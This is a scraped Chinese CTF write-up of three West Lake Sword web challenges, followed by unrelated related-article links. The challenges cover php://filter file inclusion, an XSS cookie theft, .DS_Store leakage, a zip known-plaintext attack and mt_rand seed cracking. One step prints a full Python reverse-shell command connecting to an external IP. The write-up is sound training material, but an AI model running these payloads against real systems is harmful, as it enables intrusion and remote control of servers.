西湖论剑 -web

1、babyt3

页面中出现include $_GET['file']，查看源代码，在最后发现

base64解码为dir.php

先利用文件包含读取index.php和dir.php文件

构造 ?file=php://filter/read=convert.base64-encode/resource=index.php

得到index.php

得到dir.php

dir.php可以读取文件名、目录

看到flag，再利用index.php读取flag文件即可

构造注意路径/ ?file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4

2、breakout

参考wp：https://www.jianshu.com/p/13025b096f23

xss

<p>可能是服务器的原因，我目前只能弹到自己的cookie</p> <p>得到管理员cookie后，</p> <p>反弹shell</p> <p>先在自己的服务器</p> <p>$ nc -lvvp 8000</p> <p>在命令执行处</p> <p>command=python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("118.25.89.91",8000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'&exec=1</p> <p>反弹shell成功后，flag.txt在根目录下。</p> <h2>3、猜猜flag是什么</h2> <p>方法一：扫描发现ds_store泄露</p> <div class="image-package"> <div class="image-container" style="max-width: 565px; max-height: 45px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>ds_store还原得到</p> <div class="image-package"> <div class="image-container" style="max-width: 700px; max-height: 190px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>方法二：</p> <p>发现存在xss过滤了<></p> <div class="image-package"> <div class="image-container" style="max-width: 700px; max-height: 341px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>于是想到url二次编码过滤，成功给了提示</p> <div class="image-package"> <div class="image-container" style="max-width: 700px; max-height: 382px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>经过各种尝试，发现直接加在url后访问即可。</p> <p>继续扫描目录，http://61.164.47.198:10002/e10adc3949ba59abbe56e057f20f883e/</p> <p><br></p> <div class="image-package"> <div class="image-container" style="max-width: 700px; max-height: 219px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p><br></p> <div class="image-package"> <div class="image-container" style="max-width: 477px; max-height: 238px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>访问github下载压缩包，</p> <p>感觉index.php和lengzhu.png是让我们用来明文攻击的。。</p> <p>使用明文攻击，</p> <div class="image-package"> <div class="image-container" style="max-width: 700px; max-height: 93px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>得到code，</p> <div class="image-package"> <div class="image-container" style="max-width: 700px; max-height: 405px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>seed.txt是php伪随机数爆破，</p> <p>执行：time ./php_mt_seed 2005214034 后面发现code会随时间刷新，所以下面不一样了</p> <div class="image-package"> <div class="image-container" style="max-width: 664px; max-height: 245px;"> <div class="image-view"> </div> </div> <div class="image-caption"></div> </div> <p>访问http://61.164.47.198:10002/flag/701439.txt</p> <p>得到flag</p> </article> </div> </div> </div>  <div id="SOHUCS" sid="1634008071086858240"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script>  <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad">  <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div>  <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div>  <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(2019-04-11)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1827369651919745024.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">赵羿涵妈妈</span> <div>2019年4月4日星期四天气晴今天下午放学后，老师把我们接到了托管，我和我的同桌先把书包放在了桌子上，然后再去洗完手，排好队领饭，我们吃的凉拌菠菜和凉面，她喝了面汤，但我没说。吃完饭后，我们就开始写作业。作业写完后妈妈没来，我俩就悄悄地玩起来了，玩的正高兴时妈妈接我来了，我和妈妈就回家了。想知道我俩玩的什么游戏吗？悄悄告诉你“粘胶带”游戏，我把胶带粘在她头上，她把胶带粘我头上，粘的好有乐趣呀！</div> </li> <li><a href="/article/1759956349527093248.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">溪水欢歌</span> <div>最近一直在思考，为什么我的起点不低，却始终原地踏步走？其实就一个字：笨。从过了15岁之后，脑子就变得一塌糊涂。学习很费劲，与人交往也很费劲。常常被别人说幼稚简单，自己却不以为然。经常说傻乎乎的话办傻乎乎的事，有时会搞得大家都很尴尬。自己却浑然不知。工作上一直磨难不断，不停的遇见坏人，就是因为自己智商太低，好欺负。我能健健康康活到现在，没抑郁成疾就已经烧了高香了。但始终搞不明白的是，同样的父母为啥我</div> </li> <li><a href="/article/1757793663770968064.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">骆驼哥哥刘章建</span> <div>日精进打卡第18天姓名:刘章建499期学员感谢二组公司:上海缘缀包装材料有限公司【知～学习】《六项精进》6遍，共16遍；《大学》6遍，共16遍；【经典名句分享】不要有感性的烦恼。一、修身：坚持一颗孝敬诚信正直的❤永不改变！二、齐家：跟蚂蚁一起上班，买好早餐三、建功：积极参加公司扫除道活动，把传送架下顽固污渍全部清理干净，不怕脏，不怕累，全身湿透。学习回来就要努力把优秀的经验用到公司，为公司服务。四</div> </li> <li><a href="/article/1757691839445483520.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">灵妹妹1026</span> <div>现代人用脑太多，少体悟，从技法层面来讲，武当太极道的课程，等于让现代人从身体出发，去逐步到达身心安定，身心合一的境界。在武当太极道的基础课程里，随着学习的深入，自然而然，你就会发现，练习太极本身，其实也是在循序渐进地禅修。我之所以开武当太极道的课程，也是因为现在很多人学禅修，太过动脑筋，所以我希望他能够通过练太极，从身体感受出发，放下大脑的思索。</div> </li> <li><a href="/article/1757672148337442816.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">丘语伊</span> <div>丘语伊：4.11EIA原油操作策略人们认为我不会出错，这完全是一种误解。我坦率他说，对任何事情，我和其他人犯同样多的错误。不过，我的超人之处在于我能认识自己的错误。这便是成功的秘密。我的洞察力关键是在于，认识到了人类思想内在的错误。股市在已经一片看好声中，你将付出很高的价格进场。——巴菲特原油行情走势分析：近期有报告显示，全球原油库存正在下降，除了供求关系作用外，原因还包括中美两大经济体经济数据向</div> </li> <li><a href="/article/1757592068944838656.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">我的田地</span> <div>严厉、处罚、磨难是一个人真正成长的催化剂，如果你想成为一名勇士就坦然地接受它们，如果你想成为一名懦夫就设法逃避它们。</div> </li> <li><a href="/article/1756344645996003328.htm" title="考试总结" target="_blank">考试总结</a> <span class="text-muted">子晋zj</span> <div>1.公司一开发人员申请对服务器10天的oldboy普通用户权限，如何操作？方法一：useraddoldboy#====》创建用户passwdoldboy#====》设置用户密码usermod-e`date-d"10day"+%F`oldboy#=====》获取权限方法二chage-E"2019-04-11"oldboy20#====》获取权限2.哪个文件中存放当前系统中用户密码信息?答：/etc/</div> </li> <li><a href="/article/1755940283012366336.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">Relive0623</span> <div>“我知道你会来所以我愿意等”假装一个人的孤单我要你知道，这世界上有一个人是永远等着你的，不管在什么地方，不管是什么时候，反正你知道，总有那么个人。遇见了喜欢的王子一定要表白，没有水晶鞋也没关系，或许他喜欢人字拖呢。我还是在等你，像在等走了八千里的风，不问归期。在遇见你之前，生活都是风景，如果你没办法参与，我就写下来送你。遇见你之后，最酷的是，我的风景里有你，往后的生活我们一起用心经营。“你的模样在</div> </li> <li><a href="/article/1755917609557049344.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">艺术涂料ty</span> <div>艺术涂料发展前景如何？艺术涂料并不是在抢乳胶漆的市场，而是在帮乳胶漆进行涂装效果的升级，是在供给侧，用乳胶漆的艺术化对乳胶漆进行的升级换代。不管是做艺术涂料，还是別的涂料，都不能与趋势为敌，要顺势而为。虽然乳胶漆的艺术化和艺术涂料是艺术涂料的未来发展趋势，涂料企业和经销商要跟着趋势走，不要与趋势为敌，但我们应该明白，经过多年的培育，艺术涂料和水性涂料一样，目前仍处于培育、布局和区域性收获阶段，还没</div> </li> <li><a href="/article/1755737081511952384.htm" title="2019-04-11函数参数传递，数据类型及转换" target="_blank">2019-04-11函数参数传递，数据类型及转换</a> <span class="text-muted">果冻_4c9b</span> <div>//arguments进行函数传递functiontest(){varsum=0;for(vari=0;i数据类型及转换vara='10';//Number(a)转成整数纯数值字符串//加法成连接console.log(Number(a)+10);//内部进行转换NaN转换错误的提示console.log(a-10);console.log(a/10);console.log(a*10);//pa</div> </li> <li><a href="/article/1755538672167436288.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">孙启恩</span> <div>华东师范是全国首个引进言听专业的大学有个华东师范毕业的研究生读心理学的直到自己小孩子听力有问题去咨询了很多机构才发现专业的语训老师和聋康请的专家都是他学校的教授和老师可见有多封闭，其实倒也不是封闭，其实国外这方面研究也没有领先很多。主要是国内滥竽充数的人太多，优秀人才也不愿意进来。一方面是收入低，另一方面职业发展规划缺失。当然，还有一个原因是劣币驱逐良币对的，这个说法在心理学上也是有支持的，我在学</div> </li> <li><a href="/article/1755470383202451456.htm" title="10课堂教学思考点滴" target="_blank">10课堂教学思考点滴</a> <span class="text-muted">精简执着2022</span> <div>2019-04-11星期四晴初三语文复习进入第一次模拟考试阶段，监考阅卷工作正在进行中，对于语文学习和考试，自己越来越感到漠然和无趣，总是提不起兴致，上课讲试题，带动不了学生的学习热情，上课总让我感到痛苦不堪。不得不分析原因，寻找新的教学出路，必须从语文教学的根源——阅读和写作方面找突破口，让每一节课有更明确的目标，有新意，从点滴知识的巩固到语文兴趣的激发，到语言之美的探寻，到阅读的快乐，学生作品</div> </li> <li><a href="/article/1755204170144563200.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">潘jane</span> <div>姓名:潘珊群公司:宁波市镇海承迪文具有限公司盛和塾第456期六项精进反省一组成员（日精进打卡第158天）【知～学习】：《六项精进》背诵3遍共30遍.《大学》背诵2遍共30遍.《通篇》朗读0遍共0遍.学习强国每天早上和晚上累计1小时以上······【经典名句分享】奇迹，是努力的另一个名字！【行～实践】一、修身：（对自己个人）1.晨起一杯温开水2.早睡早起3.多喝水4.每天一粒多种维生素矿物质片二、齐</div> </li> <li><a href="/article/1754873505398145024.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">陈默_ad97</span> <div>日更十三天。还是报了一个写作课。希望有所收获。昨晚拆解了一篇文章，发现了文章用的是起承转合结构。大咖用的是那么好，而我自己并不会用。发现了拆解文章是很重要的，对比大咖写的文章，能发现自己写的不足之处。为什么自己没写到，自己差在哪里。还整理了一些别人分析的内容。发现了有人写讲书稿，是自己问别人，请别人分析，然后自己慢慢死磕出来的。而我自己虽然想着要写文章，其实真的没有付出过什么。</div> </li> <li><a href="/article/1754724801085194240.htm" title="2019-04-11：每日语文积累" target="_blank">2019-04-11：每日语文积累</a> <span class="text-muted">无悔客qiqiblog</span> <div>已收藏至文集：语文素养积累友情名句1.浮云游子意，落日故人情。——李白《送友人》2.江南无所有，聊赠一枝春。——陆凯《赠范晔诗》3.浮云一别后，流水十年间。——韦应物《淮上喜会梁川故人》4.海内存知己，天涯若比邻。——王勃《送杜少府之任蜀州》5.开轩面场圃，把酒话桑麻。——孟浩然《过故人庄》6.正是江南好风景，落花时节又逢君。——杜甫《江南逢李龟年》7.一生大笑能几回，斗酒相逢须醉倒。——岑参《凉</div> </li> <li><a href="/article/1754427877878677504.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">馨馨6688</span> <div>啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊</div> </li> <li><a href="/article/1753133643833819136.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">主父眼</span> <div>「情感美文」在乎你的人，风吹草动也心疼真诚感谢你在百忙之中移驾鄙人主父眼寒舍，虽然未能如愿观赏到飞花似雪的世间绝唱，亦能在陈词滥调中洞悉绝望者满怀深情的无奈诉说。万人丛中一握手，使我衣袖三年香。认识你，我倍感荣幸！感情最怕，一腔深情换来无动于衷，人心最怕，长久期盼换来失望的痛。一个人要是没把你看重，不管你多主动，都会声色不动。一个人要是把你放心中，只要你说一声，就会立马行动。拼命对一个人好，自己到</div> </li> <li><a href="/article/1753119973749833728.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">六项精进阿晋</span> <div>1.付出不亚于任何人的努力2.要谦虚，不要骄傲3:要每天反省4:活着，就要感谢5:积善行，思利他6.不要有感性的烦恼今日分享：晚上在门口的理发店排队理发花费了1个多小时时间，理发店门店不大，但每次去生意都很好，主要是老板对客户的服务态度非常热情，老客户比较多，每个行业做的好都是有原因的。</div> </li> <li><a href="/article/1752972929072644096.htm" title="2019-04-11全脸线雕前后对比照片！这效果，按耐不住激动的小心脏啦！" target="_blank">2019-04-11全脸线雕前后对比照片！这效果，按耐不住激动的小心脏啦！</a> <span class="text-muted">必须爱美w</span> <div>全脸线雕前后对比照片！这效果，按耐不住激动的小心脏啦！无论脸上做线雕还是大V线，都是面部提升的一种方法。而且他们均可达到抗衰紧致、提升面部、改善皱纹、改善双下巴的效果，通过很多全脸线雕前后对比照片就可以看出来。"线雕"它不是一项复杂的技术。可以这么说——"线"只是基本的材料，医生的技术才决定全脸线雕的效果所以在了解线雕之前你应该先了解机构选好操作者。即，要选择正规机构以及有资质经验丰富的医师!曾有</div> </li> <li><a href="/article/1752179304063582208.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">宛若小溪</span> <div>从这周开始，若溪每周四晚上都得上中教课了。下午放了学，爷俩儿饭也没顾上吃就出发了。还好中教课时间比外教课短，回来的时候早一些。匆忙吃了点饭，时间已经显示八点多了。若溪抓紧开始写作业。虽然时间上很赶，但是若溪却没说不想去。孩子这么坚持，我们做家长的也一定会克服各种困难，陪着她一直走下去。</div> </li> <li><a href="/article/1751754930588237824.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">枫叶红时总多离别</span> <div>2019年4月9日星期二晴今天体育课，老师让我们先跑一圈。我们跑着跑着都停下来了，大家都发现郑佳乐哭了，我们不知道是什么原因，后来陈恩佩说他跑的太快摔倒了。跑完步老师让我们去操场上打球。我们去蓝球室一人拿一个蓝球到操场去玩。我和陈玺雅、余金恩、方雨心一起玩海盗船长游戏。我是船长，其它人都是船员。我正驾驶海盗船，突然方雨心跑过来压住了我的脚，皮被弄破了，幸好没有流血，可是很痛。我正想问方雨心，你为什</div> </li> <li><a href="/article/1751680727071604736.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">李飞720</span> <div>姓名：李飞企业名称：临沂鑫道食品有限公司组别373期利他1组日精进打卡第358天】【知~学习】1、阿米巴经营一段2、活用人才1段3、活法、一段4、经营34问、一段【行~实践】一、修身：读书、抽烟减量、俯卧撑个跑步3公里二、齐家三、建功、产品开发【经典名句分享】1、依据原理原则追求事物的本质，以“作为人，何谓正确”进行判断2、经营者必须为员工物质和精神两方面的幸福殚精竭虑，倾尽全力，必须超脱私心，让</div> </li> <li><a href="/article/1750971411565920256.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">古井不波_c456</span> <div>每一个中国人都渴望有一套属于自己的房子，住房承载了我们太多的梦想，它不仅是我们遮风避雨的居所，而且是我们情感的归属地，房和家往往成为不可分割的整体。房子，对一个30岁的人，意义犹为深远：第一，证明你是个有了根的人。进入社会，我们在各个城市里东飘西荡，拼命地工作，想靠自己的努力打出一片安身立命的天下，昂首挺胸地成为这个城市的主人。每一个人工作后的最大愿望就是挣钱买房子，有了房子你才会感到有一种归属感</div> </li> <li><a href="/article/1750778784623116288.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">小艳子789</span> <div>今天哈哈宝宝被奶奶带去老奶家了，还在那里过夜了。因为有小狗，小鸡陪他玩。哈哈。瞬间我们就回到了二人世界。我和小陈陈竟然还突然间有点不知所措。两个人不知道干点啥。我在想，以前两个人的时候是怎么过来的，当时每天都很忙碌，日程安排倒是蛮紧凑的。有了孩子，围着孩子转，突然来到无娃状态，居然内心空落落的。于是，约定去散步，走了一段，肚子小饿，又转头回家，开车去吃烧烤。烧烤店人太多，满座，于是乎隔壁找一家，预</div> </li> <li><a href="/article/1750460082006540288.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">果粒橙美味多啊</span> <div>2019喜欢的学校喜欢的工作喜欢的人都说了byebyebut这也只是一个开始吧还会有更多其它不喜欢不愿意的事情但是要会去消化去做出改变</div> </li> <li><a href="/article/1749992800029523968.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">阿拉斯加2</span> <div>讨厌自己，放弃你吗？我讨厌现在的自己，却也没有去改变自己，很迷茫，我不知道该干什么。狗子你好好的加油，我感觉到你心里有一个人，我不知道是谁，但如果你真的喜欢的话，祝你好好的幸福，你快乐就好，我呢，默默地放手吧，我也看不起自己，哪有什么资格去追这么优秀的你呢，不打扰了，廉价的人呦，无能的人呦，自卑的人哟，堕落的人呦，一个不知道到底喜不喜欢你的人呦，seeyou,感觉自己总有一天会犹豫而死，哈哈。父母</div> </li> <li><a href="/article/1749978111669190656.htm" title="2019-04-11 重在行动" target="_blank">2019-04-11 重在行动</a> <span class="text-muted">天下谁人不读书</span> <div>目前的状态，总想着怎么怎么样，找知识、学干货，可依然是：“读一读感动，想一想激动，一段时间岿然不动，结果自然没用”。要改变自己的生活，就要把知识学透、学会并付诸实践，把知识付诸实践和掌握知识本身一样重要。同时更重要的是学习再多也不如动一动，只有行动了，才会发现读到的知识，纸上的东西在实际操作中碰到的问题，并非一蹴而就那么简单。一步一步地去落实、去实践，不断前进的同时，博取众家之所长，及时更新自己的</div> </li> <li><a href="/article/1749434660494000128.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">916ef118ffc6</span> <div>如何收集老赖拒不执行判决、裁定的相关证据？老赖拒不执行判决、裁定会涉嫌刑事犯罪，申请执行人可以要求公安机关追究其刑事责任，但公安机关或者人民检察院不予追究被告人刑事责任的，申请执行人可以自己直接向法院起诉，那么，自己起诉时需要收集哪些证据呢？一、收集证明被告人主体信息的证据材料，包括：1、被告人为自然人的，应当收集证明被告人身份信息的户籍资料。2、被告人为单位的，应当收集该单位的工商登记资料，以及</div> </li> <li><a href="/article/1748912386842050560.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">仰慕幸福</span> <div>今天是老姐的生日，因为没发工资，生日礼物先欠着，等发了工资了之后给她补上，希望她每天都开开心心的，当然这个神仙也做不到，但是呢，希望他整体的人生是平静安详，幸福的。小雨童的伤呢，都结痂了好多了，我也放心多了，晚上了，看个电影，一直不睡觉，非要说看完才要才要才要睡看完了吧？都11点了，让他睡他也不睡，他也不睡，我只好把他扔到床上，然后走了交给他爸爸妈妈吧！我这个上班一族也要回家了，洗洗睡了，毕竟还有</div> </li> <li><a href="/article/1748428083435683840.htm" title="2019-04-11" target="_blank">2019-04-11</a> <span class="text-muted">开拓者马先生</span> <div>漫威《复联4》未播先火，网友：国内票房将超《战狼2》，你信吗众所周知，2018年上映的《复仇者联盟3》全球票房超过20亿美元，登上全球影史第四宝座。《复仇者联盟3》目前是漫威宇宙最好的作品，极大的扩大了漫威宇宙在全球市场的影响力，使得无数漫威粉更加期待《复仇者联盟4》。《复仇者联盟4》是漫威宇宙第22部作品，也是漫威娱乐影业第三阶段的集大成之作。《复仇者联盟4》故事剧情承接《复仇者联盟3：无限之战</div> </li> <li><a href="/article/10.htm" title="jsonp 常用util方法" target="_blank">jsonp 常用util方法</a> <span class="text-muted">hw1287789687</span> <a class="tag" taget="_blank" href="/search/jsonp/1.htm">jsonp</a><a class="tag" taget="_blank" href="/search/jsonp%E5%B8%B8%E7%94%A8%E6%96%B9%E6%B3%95/1.htm">jsonp常用方法</a><a class="tag" taget="_blank" href="/search/jsonp+callback/1.htm">jsonp callback</a> <div>jsonp 常用java方法 (1)以jsonp的形式返回:函数名(json字符串) /*** * 用于jsonp调用 * @param map : 用于构造json数据 * @param callback : 回调的javascript方法名 * @param filters : <code>SimpleBeanPropertyFilter theFilt</div> </li> <li><a href="/article/137.htm" title="多线程场景" target="_blank">多线程场景</a> <span class="text-muted">alafqq</span> <a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">多线程</a> <div>0 能不能简单描述一下你在java web开发中需要用到多线程编程的场景？0 对多线程有些了解，但是不太清楚具体的应用场景，能简单说一下你遇到的多线程编程的场景吗？ Java多线程 2012年11月23日 15:41 Young9007 Young9007 4 0 0 4 Comment添加评论关注(2) 3个答案按时间排序按投票排序 0 0 最典型的如： 1、</div> </li> <li><a href="/article/264.htm" title="Maven学习——修改Maven的本地仓库路径" target="_blank">Maven学习——修改Maven的本地仓库路径</a> <span class="text-muted">Kai_Ge</span> <a class="tag" taget="_blank" href="/search/maven/1.htm">maven</a> <div>      安装Maven后我们会在用户目录下发现.m2 文件夹。默认情况下，该文件夹下放置了Maven本地仓库.m2/repository。所有的Maven构件(artifact)都被存储到该仓库中，以方便重用。但是windows用户的操作系统都安装在C盘，把Maven仓库放到C盘是很危险的，为此我们需要修改Maven的本地仓库路径。    </div> </li> <li><a href="/article/391.htm" title="placeholder的浏览器兼容" target="_blank">placeholder的浏览器兼容</a> <span class="text-muted">120153216</span> <a class="tag" taget="_blank" href="/search/placeholder/1.htm">placeholder</a> <div>【前言】自从html5引入placeholder后，问题就来了，不支持html5的浏览器也先有这样的效果，各种兼容，之前考虑，今天测试人员逮住不放，想了个解决办法，看样子还行，记录一下。   【原理】不使用placeholder，而是模拟placeholder的效果，大概就是用focus和focusout效果。   【代码】 <scrip</div> </li> <li><a href="/article/518.htm" title="debian_用iso文件创建本地apt源" target="_blank">debian_用iso文件创建本地apt源</a> <span class="text-muted">2002wmj</span> <a class="tag" taget="_blank" href="/search/Debian/1.htm">Debian</a> <div>1.将N个debian-506-amd64-DVD-N.iso存放于本地或其他媒介内，本例是放在本机/iso/目录下 2.创建N个挂载点目录如下： debian:~#mkdir –r /media/dvd1 debian:~#mkdir –r /media/dvd2 debian:~#mkdir –r /media/dvd3 …. debian:~#mkdir –r /media</div> </li> <li><a href="/article/645.htm" title="SQLSERVER耗时最长的SQL" target="_blank">SQLSERVER耗时最长的SQL</a> <span class="text-muted">357029540</span> <a class="tag" taget="_blank" href="/search/SQL+Server/1.htm">SQL Server</a> <div>对于DBA来说，经常要知道存储过程的某些信息： 1.   执行了多少次 2.   执行的执行计划如何 3.   执行的平均读写如何 4.   执行平均需要多少时间列名          &</div> </li> <li><a href="/article/772.htm" title="com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil" target="_blank">com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil</a> <span class="text-muted">7454103</span> <a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a> <div>今天eclipse突然报了com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 错误，并且工程文件打不开了，在网上找了一下资料，然后按照方法操作了一遍，好了，解决方法如下：错误提示信息： An error has occurred.See error log for more details. Reason: com/genuitec/</div> </li> <li><a href="/article/899.htm" title="用正则删除文本中的html标签" target="_blank">用正则删除文本中的html标签</a> <span class="text-muted">adminjun</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/1.htm">正则表达式</a><a class="tag" taget="_blank" href="/search/%E5%8E%BB%E6%8E%89html%E6%A0%87%E7%AD%BE/1.htm">去掉html标签</a> <div>使用文本编辑器录入文章存入数据中的文本是HTML标签格式，由于业务需要对HTML标签进行去除只保留纯净的文本内容，于是乎Java实现自动过滤。如下： public static String Html2Text(String inputString) { String htmlStr = inputString; // 含html标签的字符串 String textSt</div> </li> <li><a href="/article/1026.htm" title="嵌入式系统设计中常用总线和接口" target="_blank">嵌入式系统设计中常用总线和接口</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/linux+%E5%9F%BA%E7%A1%80/1.htm">linux 基础</a> <div>               嵌入式系统设计中常用总线和接口         任何一个微处理器都要与一定数量的部件和外围设备连接，但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接，那么连线</div> </li> <li><a href="/article/1153.htm" title="Java函数调用方式——按值传递" target="_blank">Java函数调用方式——按值传递</a> <span class="text-muted">ayaoxinchao</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%8C%89%E5%80%BC%E4%BC%A0%E9%80%92/1.htm">按值传递</a><a class="tag" taget="_blank" href="/search/%E5%AF%B9%E8%B1%A1/1.htm">对象</a><a class="tag" taget="_blank" href="/search/%E5%9F%BA%E7%A1%80%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B/1.htm">基础数据类型</a> <div>Java使用按值传递的函数调用方式，这往往使我感到迷惑。因为在基础数据类型和对象的传递上，我就会纠结于到底是按值传递，还是按引用传递。其实经过学习，Java在任何地方，都一直发挥着按值传递的本色。   首先，让我们看一看基础数据类型是如何按值传递的。   public static void main(String[] args) { int a = 2; </div> </li> <li><a href="/article/1280.htm" title="ios音量线性下降" target="_blank">ios音量线性下降</a> <span class="text-muted">bewithme</span> <a class="tag" taget="_blank" href="/search/ios%E9%9F%B3%E9%87%8F/1.htm">ios音量</a> <div>直接上代码吧   //second 几秒内下降为0 - (void)reduceVolume:(int)second { KGVoicePlayer *player = [KGVoicePlayer defaultPlayer]; if (!_flag) { _tempVolume = player.volume; </div> </li> <li><a href="/article/1407.htm" title="与其怨它不如爱它" target="_blank">与其怨它不如爱它</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/%E9%80%89%E6%8B%A9/1.htm">选择</a><a class="tag" taget="_blank" href="/search/%E7%90%86%E6%83%B3/1.htm">理想</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E4%B8%9A/1.htm">职业</a><a class="tag" taget="_blank" href="/search/%E8%A7%84%E5%88%92/1.htm">规划</a> <div>        抱怨工作是年轻人的常态，但爱工作才是积极的心态，与其怨它不如爱它。         一般来说，在公司干了一两年后，不少年轻人容易产生怨言，除了具体的埋怨公司“扭门”，埋怨上司无能以外，也有许多人是因为根本不爱自已的那份工作，工作完全成了谋生的手段，跟自已的性格、专业、爱好都相差甚远。   </div> </li> <li><a href="/article/1534.htm" title="一边时间不够用一边浪费时间" target="_blank">一边时间不够用一边浪费时间</a> <span class="text-muted">bingyingao</span> <a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E6%97%B6%E9%97%B4/1.htm">时间</a><a class="tag" taget="_blank" href="/search/%E6%B5%AA%E8%B4%B9/1.htm">浪费</a> <div>一方面感觉时间严重不够用，另一方面又在不停的浪费时间。每一个周末，晚上熬夜看电影到凌晨一点，早上起不来一直睡到10点钟，10点钟起床，吃饭后玩手机到下午一点。精神还是很差，下午像一直野鬼在城市里晃荡。为何不尝试晚上10点钟就睡，早上7点就起，时间完全是一样的，把看电影的时间换到早上，精神好，气色好，一天好状态。控制让自己周末早睡早起，你就成功了一半。有多少个工作</div> </li> <li><a href="/article/1661.htm" title="【Scala八】Scala核心二：隐式转换" target="_blank">【Scala八】Scala核心二：隐式转换</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/scala/1.htm">scala</a> <div>Implicits work like this: if you call a method on a Scala object, and the Scala compiler does not see a definition for that method in the class definition for that object, the compiler will try to con</div> </li> <li><a href="/article/1788.htm" title="sudoku slover in Haskell (2)" target="_blank">sudoku slover in Haskell (2)</a> <span class="text-muted">bookjovi</span> <a class="tag" taget="_blank" href="/search/haskell/1.htm">haskell</a><a class="tag" taget="_blank" href="/search/sudoku/1.htm">sudoku</a> <div>继续精简haskell版的sudoku程序，稍微改了一下，这次用了8行，同时性能也提高了很多，对每个空格的所有解不是通过尝试算出来的，而是直接得出。   board = [0,3,4,1,7,0,5,0,0, 0,6,0,0,0,8,3,0,1, 7,0,0,3,0,0,0,0,6, 5,0,0,6,4,0,8,0,7, </div> </li> <li><a href="/article/1915.htm" title="Java-Collections Framework学习与总结-HashSet和LinkedHashSet" target="_blank">Java-Collections Framework学习与总结-HashSet和LinkedHashSet</a> <span class="text-muted">BrokenDreams</span> <a class="tag" taget="_blank" 